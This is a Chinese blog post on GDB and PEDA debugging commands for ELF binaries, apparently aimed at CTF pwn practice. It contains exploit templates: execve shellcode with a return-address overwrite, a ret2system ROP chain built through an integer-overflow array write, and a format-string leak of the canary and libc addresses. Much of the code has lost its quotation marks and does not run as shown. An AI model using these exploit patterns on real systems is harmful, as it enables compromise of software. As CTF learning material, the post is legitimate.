GDB分析ELF文件常用的调试技巧

最新推荐文章于 2023-11-03 20:33:35 发布
最新推荐文章于 2023-11-03 20:33:35 发布
阅读量4.8k 收藏 8
点赞数 1
分类专栏: pwn 文章标签: 技术 gdb 安全

GDB分析ELF文件常用的调试技巧

gdb常用命令

首先是gbd+文件名 静态调试 ,gdb attach +文件名 动态调试

为了方便查看堆栈和寄存器 最好是安装peda插件

安装

可以通过pip直接安装,也可以从github上下载安装

$ pip install peda

$ git clone https://github.com/longld/peda.git ~/peda
$ echo "source ~/peda/peda.py" >> ~/.gdbinit

命令

  • aslr – 显示/设定GDB的ASLR(地址空间配置随机加载)设置 
    技术分享

  • checksec – 检查二进制文件的各种安全选项 
    技术分享

  • dumpargs – 函数将要被调用时,显示将要被传入函数的所有参数(默认会在反汇编代码下方自动显示)

  • dumprop – 在给定内存范围中Dump出所有ROP gadgets 
    技术分享

  • elfheader – Get headers information from debugged ELF file

  • elfsymbol – 获取non-debugging symbol信息(plt表) 
    技术分享

  • lookup – Search for all addresses/references to addresses which belong to a memory range

  • patch – Patch memory start at an address with string/hexstring/int

  • pattern – 生成字符串模板 写入内存 用于定位溢出点

    • pattern create size 生成特定长度字符串
    • pattern offset value 定位字符串 
      技术分享

  • procinfo – Display various info from /proc/pid/

  • pshow – Show various PEDA options and other settings

  • pset – Set various PEDA options and other settings

  • readelf – 获取elf头信息 
    技术分享

  • ropgadget – Get common ROP gadgets of binary or library 
    技术分享

  • ropsearch – Search for ROP gadgets in memory

  • searchmem|find – 在内存中查找字符串,支持正则表达式 
    技术分享

  • shellcode – 生成shellcode 
    技术分享

  • skeleton – Generate python exploit code template

  • vmmap – 可以用来查看栈、bss段是否可以执行 
    技术分享

  • xormem – XOR a memory region with a key

更多详细用法请参考官方帮助文档

技术分享

 

1. checksec 查看elf编译的保护选项。

2. file [file] 加载objfile

3. disas addr 对地址addr处的指令进行反汇编,addr可以是函数名

4. b *addr 在addr处下一个断点

5. x addr 查看addr处存储的数据值

6. r 运行被调试的程序

7. c 继续运行

8. ni 单步执行不进入

9. si 单步执行并进入

10.vmmap 得到虚拟映射地址

 

PWN题常用模板

单个发送(pwn库)

1 #coding=utf-8   #中文乱码
2 from zio import *
3 Thread = zio((./pwn))  #执行同目录下的pwn
4 Thread = write(a*64+\x00\x00\x00\x01)  #输入我们的payload
5 Thread = interact()
6 //p32(Address) 把32位地址 写成0x形式  同理64位的也是

 

ZIO库

 1 from zio import *
 2 from pwn import *
 3 Thread = zio((./pwn))
 4 #shellcode1=‘\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05‘
 5 shellcode=\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50
 6 TargetAddress = 0x000000000040066E
 7 Length = len(shellcode)
 8 payload = shellcode+\x90*(72-Length)+p64(TargetAddress)
 9 Thread.write(payload)
10 Thread.interact()
11

pwn库 有消息接收和判断的


 1 from pwn import *
 2 Shellcode=a*112+\x5D\x86\x04\x08
 3 Target=process(./pwn)
 4 Target.sendline(Shellcode)
 5 Target.recvuntil(:$)
 6 #context.terminal = [‘gnome-terminal‘,‘-x‘,‘sh‘,‘-c‘]
 7 #gdb.attach(proc.pidof(Target)[0])
 8 Target.sendline(zhimakaimen)
 9 Target.interactive()
10  
11

 

整数溢出型

 1 from pwn import *
 2 
 3 #r = remote(‘127.0.0.1‘, 9527)
 4 r = process(./pwn3)
 5 r.recvuntil(name \n)
 6 r.sendline(123)
 7 #raw_input(‘debug‘
 8 ##构造结构可以是:scanf->ret->”%9s”->某地址->system->填充->某地址。
 9 ?
10 #下面开始构造
11 r.recvuntil(index\n)
12 #-2147483648  -->0x80000000 *4后溢出为0
13 context.terminal = [gnome-terminal,-x,sh,-c] 
14 gdb.attach(proc.pidof(p)[0])
15 r.sendline(str(-2147483648 + 14))  #ebp+4的地址处  就是Return函数的地址  现在是一处地址一处值  1
16 r.recvuntil(value\n)
17 r.sendline(str(int(8048470, 16)))  #jmp  scanf
18 r.recvuntil(index\n)
19 r.sendline(str(-2147483648 + 15))   #ebp+8
20 r.recvuntil(value\n)
21 r.sendline(str(int(0x080487de, 16)))  # pop     edi
22 r.recvuntil(index\n)
23 r.sendline(str(-2147483648 + 16))  
24 r.recvuntil(value\n) 
25 r.sendline(str(int(804884b,16)))  #0804884B a9s      db ‘%9s‘,0 
26 r.recvuntil(index\n)
27 r.sendline(str(-2147483648 + 17))  
28 r.recvuntil(value\n)
29 r.sendline(str(int(804a030, 16)))  #0804A030 __data_star  804a030 是GOT表的结尾
30 r.recvuntil(index\n)
31 r.sendline(str(-2147483648 + 18))
32 r.recvuntil(value\n)
33 r.sendline(str(int(8048420, 16))) #system  #jmp to system
34 r.recvuntil(index\n) 
35 r.sendline(str(-2147483648 + 19))
36 r.recvuntil(value\n)
37 r.sendline(str(int(804a030, 16)))  #0804A030 __data_start    db    0 
38 r.recvuntil(index\n)
39 r.sendline(str(-2147483648 + 20))
40 r.recvuntil(value\n)
41 r.sendline(str(int(804a030, 16)))  #0804A030 __data_start    db    0 
42 r.recvuntil(index\n)
43 r.sendline(str(-2147483648 + 21))
44 r.recvuntil(value\n)
45 r.sendline(str(int(8048420, 16)))  ##system  #jmp to system
46 r.recvuntil(index\n)
47 r.sendline(str(-2147483648 + 22))
48 r.recvuntil(value\n)
49 r.sendline(str(int(8048420, 16)))  ##system  #jmp to system
50 r.recvuntil(index\n)  #相当与让代码结束 执行ret从而执行到我们的流程
51 r.sendline(-1)
52 r.recvuntil(value\n)
53 r.sendline(10)
54 r.recvuntil(0 0 0 0 0 0 0 0 0 0 )
55 r.sendline(/bin/sh)
56 r.interactive()

 

 
 

格式化字符串

 1 from pwn import *
 2 libc=ELF(/lib/i386-linux-gnu/i686/cmov/libc.so.6)
 3 p=process("./pwn2")
 4 context.terminal = [gnome-terminal,-x,sh,-c] 
 5 gdb.attach(proc.pidof(p)[0])       
 6 p.recvuntil(name:)
 7 p.sendline(%p.*40)     #输出字符串 
 8 leak_data=p.recvuntil(messages:)
 9 address=leak_data.split(.)            #将输出的地址分组 然后进行分组
10 canary=int(address[30],16)     #这里为什么是 第30个
11 stack_addr=int(address[33],16)-0x90+0x8+0x8   #这里也不懂
12 put_addr=int(address[22],16)-0x144                  
13 system_addr=put_addr-(libc.symbols[puts]-libc.symbols[system])
14 ?
15 payload =a*100+p32(canary)+a*12+p32(system_addr)+bbbb+p32(stack_addr)+/bin/sh\x00
16 ?
17 p.sendline(payload)
18 ?
19 p.interactive()

 

SPbun
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
在pwntools里面调用gdb
qq_33458986的博客
04-04 8610
在pwn里面,几个重要的工具有IDA,ollydbg,gdb(pwndbg,peda…),pwntools等 IDA是比较全面的工具,界面也比较友好,但是动态调试elf比较麻烦,需要选中remote linux debugger,详见IDA+pwntools环境搭建,这里使用pwntools进行交互的好处作者提到是可以 发送不可打印字符,但是我按照作者的教程,pwntools成功连接上ubuntu...
使用gdb分析core文件相关方法
02-28
本文档详细描述了在实际工程调试过程中如何使用gdb分析core文件。结合实际中出现的一些问题,配图描述了如何通过gdb工具从堆栈,回溯等信息判断出来问题所在。对实际工程调试起到一定指导作用
gdb 读取elf
weixin_34114823的博客
08-26 538
在make file中找到ld,然后将其换成 gdb, 如本例中LINKER = /usr/cygnus/xscale-020523/H-sparc-sun-solaris2.5/bin/xscale-elf-ld 所以gdb 是/usr/cygnus/xscale-020523/H-sparc-sun-solaris2.5/bin/xscale-elf-gdb 然后gdb 那个elf文件,...
Android下使用GDB调试无符号ELF文件
一叶舟轻
06-18 3710
本文解决如何在Android下使用gdb调试无符号的ELF文件,尤其是内存buju
pwn 题GDB调试技巧和exp模板
推理小孩的博客
08-31 2519
pwn 题GDB调试技巧和exp模板 GDB分析ELF文件常用调试技巧 gdb常用命令 首先是gbd+文件名 静态调试gdb attach +文件名 动态调试 为了方便查看堆栈和寄存器 最好是安装peda插件 安装 可以通过pip直接安装,也可以从github上下载安装 $ pip install peda $ git clone h...
Linux系统下gdb调试
qq_42856609的博客
03-22 914
2、gdb用法介绍(1)生成带有调试信息的可运行程序,命令如下:g++ -g main.cpp -o main //生成带有调试信息的可运行程序main,编译参数-g结果如下:ls -lh # 以人类可读的方式显示当前目录中的文件和目录大小没有调试信息的结果如下:有调试信息的结果如下:以看出,没有调试信息的会提示:No debugging symbols found in…,有调试信息的会提示Reading symbols from …。
exp与gdb联合调试(一)
xiaorur的博客
08-30 900
题目链接 题解见博客 XXXXXXXX,本文重点在于使用raw_input动态联合调试 IDA后的源码,一个简单的格式化字符串任意读例题 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[256]; // [esp+1Ch] [ebp-104h] BYREF unsigned int v5; // [esp+11Ch] [ebp-4h] ​ v5 = __readgsdword...
gdb调试常用命令.pdf
最新发布
04-12
gdb调试
Linux下如何使用gdb调试core文件
09-14
主要介绍了Linux下如何使用gdb调试core文件,帮助大家更好的理解和学习Linux,感兴趣的朋友可以了解下
Linux gdb 调试coredump文件的尝试
01-09
-g:在可执行文件中加入源码信息,比如:可执行文件中第几条机器指令对应源代码的第几行,但并不是把整个源文件都嵌入到可执行文件中,而是在调试时必须保证gdb能找到源文件。这些调试信息包括行号、变量的类型和...
调试相关的elf format/gdb/dwarf
10-25
文档全部来自官方网站,英文原版。内容包含(Dwarf3,DWARF4,ELF_Format和gdb
pwn入门:详解gdb调试程序的常见命令
Bossfrank的博客
11-03 1606
本文主要以对一个程序的调试过程为例,介绍gdb调试器的常见命令,并直观的展示所谓“溢出”覆盖的效果以及大小端序的问题。涉及的知识点包括:pwn题目环境的部署、gdb调试的常见命令、大小端序的影响、简单解pwn题目脚本的编写。
PWN中GDB调试工具的基本使用
qq_29174265的博客
07-06 1338
编译时,编译器为了输出执行更快的代码,所以不带有debuginfo,无法使用GDB进行调试,应使用。: 监视变量i,当i的值发生变化时停下(watchpoint),也相当于打断点。指定大小 起始内存地址,即查看起始内存地址上指定大小的内存里的值。: 给存储在address地址的变量类型为type的变量赋值。显示某个地址处开始的16进制内容,如果有符号表会加载符号表。是一个正整数,表示需要显示的内存单元的个数。开始的3个字节的值,也可以是。按十六进制格式显示变量。按十六进制格式显示变量。
如何在做pwn题的过程中使用gdb测试
weixin_45966329的博客
03-07 652
如何在做pwn题的过程中使用gdb测试 前言 本人也是刚入门久,以前苦于在写exp时怎么利用gdb进行调试分析,总不能一个一个字节的在gdb写入调试吧,哈哈哈,那样太傻了。献丑了,大佬们笑笑就好 方法 本人了解的方法有两种 上代码 def debug(): #该方法会在程序未结束时打开gdb对程序进行调试,在debug后就进入了交互模式 gdb.attach(io) io.interactive() def debug_pause(): #该方法会在程序未结束时打开gdb对程序进行调试,而且会逐一
解决运行在kali环境下的pwntools无法给gdb.attach()时候传递gdbscript的问题
fjh1997的博客
03-11 2369
最近在做pwn题,写了如下脚本: ##!/usr/bin/env python from pwn import* r=process('./ret2libc2') sys_adr=0x08048490 gets_adr=0x08048460 buf2_adr=0x0804A080 gdb.attach(r,''' b * 080486BA ''') payload=b'A'*112+...
ELF目标文件概述
qq_44707791的博客
11-20 495
ELF目标文件概述 目标文件分为三种:可重定位目标文件,可执行目标文件和共享目标文件。Linux中使用ELF格式 (举例的两个.c文件:) /* main.c */ /* $begin main */ int sum(int *a, int n); int array[2] = {1, 2}; int main() { int val = sum(array, 2); ret...
pwn学习---attach调试与ret2libc
gclome的博客
03-28 1230
0x01 attach调试 我们将4.c文件编译成41.exe,然后使用python脚本运行 C语言程序如下: #include<stdio.h> void exploit() { system("/bin/sh"); } void main() { char buf[20]; gets(buf); } python代码如下: from pwn im...
【JDBC】学习笔记__案例
qq_41440031的博客
02-25 2989
JDBC入门 JDBC功能类详解 JDBC案例 JDBC工具类 JDBCSQL注入攻击 JDBC事务 JDBC入门 概念:是一种用于执行java语句的API 本质:一套帮助开发人员实现不同关系型数据链接的规范(接口) 1、程序案例: 导入jar包 注册驱动 获取数据连接(已经提前准备好一个案例数据) 获取执行者对象 执行sql语句返回结果 处理结果 释放资源 总结:首先注册驱动,然后获得一个数据连接的对象connection,通过使用该对象获得一个执行者对象...
gdb调试dbg文件
11-23
为了更好地回答您的问题,需要先了解一下dbg文件的含义。dbg文件是一种调试信息文件,它包含了程序的符号表、源代码文件名、行号以及其他调试信息。在使用gdb调试程序时,需要使用该程序对应的dbg文件才能进行源代码级别的调试。 下面是使用gdb调试dbg文件的步骤: 1. 启动gdb并加载程序和dbg文件: ```shell gdb <program> -d <directory containing dbg file> ``` 2. 设置断点: ```shell break <filename>:<line number> ``` 3. 运行程序: ```shell run ``` 4. 当程序停止在断点处时,可以使用gdb的各种命令进行调试,例如查看变量的值、单步执行等等。 下面是一个示例: ```shell gdb myprogram -d debuginfo break main.c:10 run ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值